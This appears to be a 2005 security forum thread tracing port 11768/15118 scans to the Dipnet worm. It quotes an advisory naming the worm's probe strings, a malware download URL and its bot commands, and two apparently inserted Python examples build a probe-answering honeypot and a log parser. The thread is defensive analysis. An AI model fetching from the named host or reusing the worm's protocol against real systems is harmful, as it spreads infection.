
Drunkula
join:2000-06-12
Denton, TX

reply to jamesv

Re: attacks on port 11768?

I hadn't bothered looking at my logs lately, until today, but my firewall is getting activity on 11768 as well. Not many (85 in the past day and a half), but it's dropping all that traffic anyhow.
--
Repeal the "Sarbanes-Oxley Act"... It sucks!

kpatz
MY HEAD A SPLODE
join:2003-06-13
Manchester, NH

I'm seeing hits on 15118 now. Approximately 40 probes on that port so far. And 5 on 11768. I almost started a new thread but did a search first.

Dshield is showing a huge increase in scans on this port over the past 5 days:
»www.dshield.org/port_report.php?···&days=40
--
SMTP: Spam and Malware Transfer Protocol. Also used on rare occasion to transmit e-mail messages.



Link Logger
join:2001-03-29
Calgary, AB

reply to jamesv

[Screenshot: Scans]
[Screenshot: Scanners]
Traffic is dying off here. I did set up the honeypot to give the 'I'm already infected' response to see if anything replies to that.

So far I've seen 277 port 11768 scans from 197 different sources and 232 port 15118 scans from 98 sources.

Since this began here only 4 systems have scanned both ports 11768 and 15118.

Blake
--
Vendor: Firewall Logging Software »www.SonicLogger.com - SonicWall and 3Com »www.LinkLogger.com - Linksys, Netgear and Zyxel


jvmorris
I Am The Man Who Was Not There.
join:2001-04-03
Reston, VA

said by Link Logger:

... Since this began here only 4 systems have scanned both ports 11768 and 15118.
Blake,

Regarding these 4 systems probing both 11768 and 15118, did both ports get probed in the same incident? Or was it more a case of an IP that had previously probed 11768 later probed 15118?

Looking at the dShield data that kpatz references, it sort of looks like 11768 probes began to decrease about the same time as 15118 probes increased. Your own data also seems to follow that trend.
--
Regards, Joseph V. Morris


Sr Tech
join:2003-01-19
New Fairfield, CT

reply to Link Logger
Here is a link to a site that might help.

»www.simovits.com/nyheter9902.html

They show what ports viruses and trojans use. The only one I see is port 808 but cannot find the others.

This web site shows which ports are used for what.
»www.iss.net/security_center/advi···s/Ports/

Maybe these sites will shed some light, or maybe not.

Actually I may have found why hits are on port 11768
»www.lurhq.com/dipnet.html

by LURHQ Threat Intelligence Group

URL: »www.lurhq.com/dipnet.html
Release Date: January 13, 2005

Dipnet (or Oddbob) is a worm that spreads using the well-known MS04-011 vulnerability that Sasser was based on. Its purpose is to spread an IRC DDoS bot. Later variants of Dipnet are causing some interest due to unusual traffic patterns on TCP port 11768 (and later on TCP port 15118).
Analysis
Before Dipnet exploits a host, it first attempts to connect to that host on a chosen TCP port (11768 or 15118) and sends the string "__123_asdasdfdjhsdf_SAFasdfhjsdf_fsd123". If the host is already infected by Dipnet, it will respond with a specific response encoded in the body of the worm. The latest variant we've seen responds with "__1asdfasdFasdfhjsdf_fsd1092381-029348723-1AAA3", then closes the connection. This exchange allows the worm to avoid infecting hosts that are already running the latest version of the worm software.

If the worm ascertains that the host is not already infected, or is not running the latest version, it will then attempt to exploit the LSASS vulnerability on TCP port 445. The shellcode of the exploit is self-decrypting, with the bulk of the code XORed by 0xFF in order to obfuscate the payload strings and prevent null bytes from prematurely terminating the payload while being copied in memory by the affected host. When decrypted, the shellcode continues running and downloads the worm executable from a remote webserver and runs it.

The shellcode as received is as follows:


The shellcode uses InternetOpenA and WinExec Windows API calls to download and execute a file from a URL. This particular shellcode downloads the file from:
»atlrce.com/stuff.exe

The worm executable sets up its own listener on the specified port in order to communicate with future instances of the worm that may attempt to exploit the host. It also communicates with two different websites in order to receive additional commands. Commands can be one of the following:

DIE: delete worm registry keys and exit
DOWNLOAD: download a file via HTTP
EXEC: execute a file
RESET: restart the scanner with a new batch of IP address masks
APPEND: insert additional IP address masks to scan

The first website provides the worm with a list of IP address ranges to scan and exploit. The second website provides the worm with other malware to download and execute. Finally, the worm begins to scan and exploit additional hosts based on the IP address masks given.
At the time of this writing, two additional executables were being served up by the control websites. One is an IRC DDoS bot identified as Backdoor.Win32.IRCBot.k, the other is a backdoor with a kernel-level driver that hides the process, known as Backdoor.Win32.Masteseq.

The DDoS bot connects to a channel on a private IRC server in Russia. At the time of this writing the channel had accumulated between 2800 and 2900 infected hosts.


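As an added example (not LURHQ's or the poster's code): the pre-infection handshake described in the advisory above, turned into a small responder of the kind Link Logger mentions earlier, one that answers the worm's probe with the "already infected" string so the worm skips its port-445 exploit attempt, and records every source that tried. The probe/reply strings and the two ports come from the advisory; the bind address, log format and timeout are assumptions.

```python
import socketserver
import threading
from datetime import datetime, timezone
from typing import Optional

# Handshake strings quoted in the LURHQ advisory (latest variant as of Jan 2005).
PROBE = b"__123_asdasdfdjhsdf_SAFasdfhjsdf_fsd123"
REPLY = b"__1asdfasdFasdfhjsdf_fsd1092381-029348723-1AAA3"
DIPNET_PORTS = (11768, 15118)

def classify(payload: bytes) -> str:
    """Label what arrived on a Dipnet port: the documented probe or something else."""
    if payload.startswith(PROBE):
        return "dipnet-probe"
    if not payload:
        return "empty-connect"   # connect with no data (scanner, retransmit, etc.)
    return "unknown"

def respond(payload: bytes) -> Optional[bytes]:
    """Answer only the documented probe; the worm then skips its 445 exploit."""
    return REPLY if classify(payload) == "dipnet-probe" else None

def log_line(src: str, port: int, label: str, when: datetime) -> str:
    """One record per connection, in a shape a log collector can ingest (assumed format)."""
    return f"{when.isoformat()} dipnet-responder src={src} dport={port} result={label}"

class DipnetHandler(socketserver.BaseRequestHandler):
    def handle(self):
        self.request.settimeout(5)          # the worm sends immediately; don't hang
        try:
            data = self.request.recv(256)
        except OSError:
            data = b""
        port = self.server.server_address[1]
        print(log_line(self.client_address[0], port, classify(data),
                       datetime.now(timezone.utc)))
        reply = respond(data)
        if reply:
            self.request.sendall(reply)     # worm reads this and closes the connection

if __name__ == "__main__":
    # Listen on both probe ports; the bind address is an assumption for this example.
    servers = [socketserver.ThreadingTCPServer(("0.0.0.0", p), DipnetHandler)
               for p in DIPNET_PORTS]
    for srv in servers:
        threading.Thread(target=srv.serve_forever, daemon=True).start()
    threading.Event().wait()               # run until interrupted
```

This only deters variants that use these exact strings and does nothing against the LSASS exploit itself; patching MS04-011 and filtering port 445 at the border remain the actual fix.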


Link Logger
join:2001-03-29
Calgary, AB

reply to jvmorris
Here are the systems which probe both 11768 and 15118, but looking at the details, it has never been in the same session.

208.209.115.244

Jan 14, 2005 14:50:05.735 - (TCP) 208.209.115.244 : 14903 >>> 192.168.1.38 : 445
Jan 14, 2005 14:50:03.702 - (TCP) 208.209.115.244 : 13969 >>> 68.144.238.148 : 15118
Jan 14, 2005 14:50:00.657 - (TCP) 208.209.115.244 : 13969 >>> 68.144.238.148 : 15118
Jan 14, 2005 14:10:46.683 - (TCP) 208.209.115.244 : 45320 >>> 192.168.1.38 : 445
Jan 14, 2005 14:10:44.469 - (TCP) 208.209.115.244 : 44497 >>> 68.144.238.148 : 15118
Jan 14, 2005 14:10:41.595 - (TCP) 208.209.115.244 : 44497 >>> 68.144.238.148 : 15118
Jan 11, 2005 13:19:49.948 - (TCP) 208.209.115.244 : 56023 >>> 192.168.1.38 : 445
Jan 11, 2005 13:19:49.557 - (TCP) 208.209.115.244 : 55893 >>> 192.168.1.35 : 11768
Jan 11, 2005 12:41:07.328 - (TCP) 208.209.115.244 : 61273 >>> 192.168.1.38 : 445
Jan 11, 2005 12:41:07.017 - (TCP) 208.209.115.244 : 61195 >>> 192.168.1.35 : 11768
Aug 24, 2004 18:34:15.699 - (TCP) 208.209.115.244 : 13050 >>> 68.144.239.109 : 445
Aug 24, 2004 18:34:09.680 - (TCP) 208.209.115.244 : 13050 >>> 68.144.239.109 : 445
Aug 24, 2004 18:34:06.786 - (TCP) 208.209.115.244 : 13050 >>> 68.144.239.109 : 445

66.194.223.194

Jan 13, 2005 09:06:31.776 - (TCP) 66.194.223.194 : 24736 >>> 68.144.238.148 : 15118
Jan 13, 2005 09:06:28.511 - (TCP) 66.194.223.194 : 24736 >>> 68.144.238.148 : 15118
Jan 13, 2005 08:42:02.323 - (TCP) 66.194.223.194 : 59708 >>> 68.144.238.148 : 15118
Jan 13, 2005 08:41:59.049 - (TCP) 66.194.223.194 : 59708 >>> 68.144.238.148 : 15118
Jan 12, 2005 05:29:21.311 - (TCP) 66.194.223.194 : 5071 >>> 192.168.1.35 : 11768
Jan 12, 2005 05:03:54.886 - (TCP) 66.194.223.194 : 10630 >>> 192.168.1.35 : 11768

70.68.26.210

Jan 13, 2005 15:41:04.776 - (TCP) 70.68.26.210 : 1412 >>> 192.168.1.38 : 445
Jan 13, 2005 15:41:02.653 - (TCP) 70.68.26.210 : 1204 >>> 68.144.238.148 : 15118
Jan 13, 2005 15:40:59.709 - (TCP) 70.68.26.210 : 1204 >>> 68.144.238.148 : 15118
Jan 13, 2005 15:02:20.514 - (TCP) 70.68.26.210 : 4672 >>> 192.168.1.38 : 445
Jan 13, 2005 15:02:18.321 - (TCP) 70.68.26.210 : 4401 >>> 68.144.238.148 : 15118
Jan 13, 2005 15:02:15.417 - (TCP) 70.68.26.210 : 4401 >>> 68.144.238.148 : 15118
Jan 11, 2005 17:24:13.219 - (TCP) 70.68.26.210 : 2344 >>> 192.168.1.35 : 11768

61.218.160.26

Jan 14, 2005 01:37:35.661 - (TCP) 61.218.160.26 : 10360 >>> 192.168.1.38 : 445
Jan 14, 2005 01:37:33.828 - (TCP) 61.218.160.26 : 10231 >>> 68.144.238.148 : 15118
Jan 14, 2005 00:47:30.320 - (TCP) 61.218.160.26 : 20460 >>> 192.168.1.38 : 445
Jan 14, 2005 00:47:24.802 - (TCP) 61.218.160.26 : 20021 >>> 68.144.238.148 : 15118
Jan 14, 2005 00:47:21.677 - (TCP) 61.218.160.26 : 19765 >>> 68.144.238.148 : 15118
Jan 11, 2005 19:59:15.645 - (TCP) 61.218.160.26 : 11323 >>> 192.168.1.38 : 445
Jan 11, 2005 19:59:14.924 - (TCP) 61.218.160.26 : 11259 >>> 192.168.1.35 : 11768

Blake
--
Vendor: Firewall Logging Software »www.SonicLogger.com - SonicWall and 3Com »www.LinkLogger.com - Linksys, Netgear and Zyxel
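As an added example (not Link Logger's code): parsing the firewall lines above to flag the Dipnet pattern, a 11768/15118 probe followed within seconds by a port-445 attempt from the same source, and to check jvmorris's question of whether any source hit both probe ports within one session. The LOG sample is a subset of lines copied from this post; the 10-second and 5-minute windows are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# A subset of the Link Logger lines posted above, pasted verbatim.
LOG = """\
Jan 14, 2005 14:50:05.735 - (TCP) 208.209.115.244 : 14903 >>> 192.168.1.38 : 445
Jan 14, 2005 14:50:03.702 - (TCP) 208.209.115.244 : 13969 >>> 68.144.238.148 : 15118
Jan 14, 2005 14:50:00.657 - (TCP) 208.209.115.244 : 13969 >>> 68.144.238.148 : 15118
Jan 11, 2005 13:19:49.948 - (TCP) 208.209.115.244 : 56023 >>> 192.168.1.38 : 445
Jan 11, 2005 13:19:49.557 - (TCP) 208.209.115.244 : 55893 >>> 192.168.1.35 : 11768
Jan 13, 2005 09:06:31.776 - (TCP) 66.194.223.194 : 24736 >>> 68.144.238.148 : 15118
Jan 12, 2005 05:29:21.311 - (TCP) 66.194.223.194 : 5071 >>> 192.168.1.35 : 11768
"""
LINE = re.compile(
    r"(?P<ts>\w{3} \d{2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{3}) - \(TCP\) "
    r"(?P<src>[\d.]+) : \d+ >>> [\d.]+ : (?P<dport>\d+)$")
PROBE_PORTS = {11768, 15118}

def parse(log):
    """Return (timestamp, source, dest port) tuples, oldest first."""
    events = []
    for line in log.splitlines():
        m = LINE.match(line)
        if m:   # skip anything that is not a connection record
            ts = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S.%f")
            events.append((ts, m["src"], int(m["dport"])))
    return sorted(events)

def probe_then_445(events, window=timedelta(seconds=10)):
    """Sources whose 11768/15118 probe is followed by a 445 hit within window:
    the Dipnet pattern (pre-infection check, then LSASS exploit attempt)."""
    last_probe, hits = {}, set()
    for ts, src, dport in events:
        if dport in PROBE_PORTS:
            last_probe[src] = ts
        elif dport == 445 and src in last_probe and ts - last_probe[src] <= window:
            hits.add(src)
    return hits

def both_ports_in_session(events, window=timedelta(minutes=5)):
    """Sources that hit BOTH probe ports within one window (jvmorris's question)."""
    probes = defaultdict(list)
    for ts, src, dport in events:
        if dport in PROBE_PORTS:
            probes[src].append((ts, dport))   # already in time order
    return {src for src, ps in probes.items()
            for i, (t1, p1) in enumerate(ps)
            for t2, p2 in ps[i + 1:] if p1 != p2 and t2 - t1 <= window}
```

On this sample the probe-then-445 check flags only 208.209.115.244 (66.194.223.194 has no 445 attempt in the excerpt), and no source shows both probe ports inside one window, matching what Link Logger reports.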



jvmorris
I Am The Man Who Was Not There.
join:2001-04-03
Reston, VA

Interesting. Thank you.



jvmorris
I Am The Man Who Was Not There.
join:2001-04-03
Reston, VA

reply to Sr Tech
Just for your general information, I don't think that Simovits URL has been updated in over two years (more's the pity).
--
Regards, Joseph V. Morris



jvmorris
I Am The Man Who Was Not There.
join:2001-04-03
Reston, VA

reply to jvmorris
I just went back to check on the status of IP addresses probing these ports that I had found in the MyNetWatchman database.

Most (but not all) of these IPs that were still active had switched from 11768 to 15118 on or about 13-14 Jan 2005. If there were enough records, it was not unusual to see episodes in which the IP seemed to alternate between probing 11768 and 15118 for a day or so. Still, I didn't find any episodes in which one of these IP addresses had probed both ports in the same episode.

There's one particularly well-documented source at »www.mynetwatchman.com/LID.asp?IID=141219490 .

There's one odd-ball probe reported for some of these sites -- it's for protocol 255 originating from port 65535 to destination port 65535. Interestingly, protocol 255 is listed as an IANA-reserved protocol. (See »www.iana.org/assignments/protocol-numbers .)
--
Regards, Joseph V. Morris
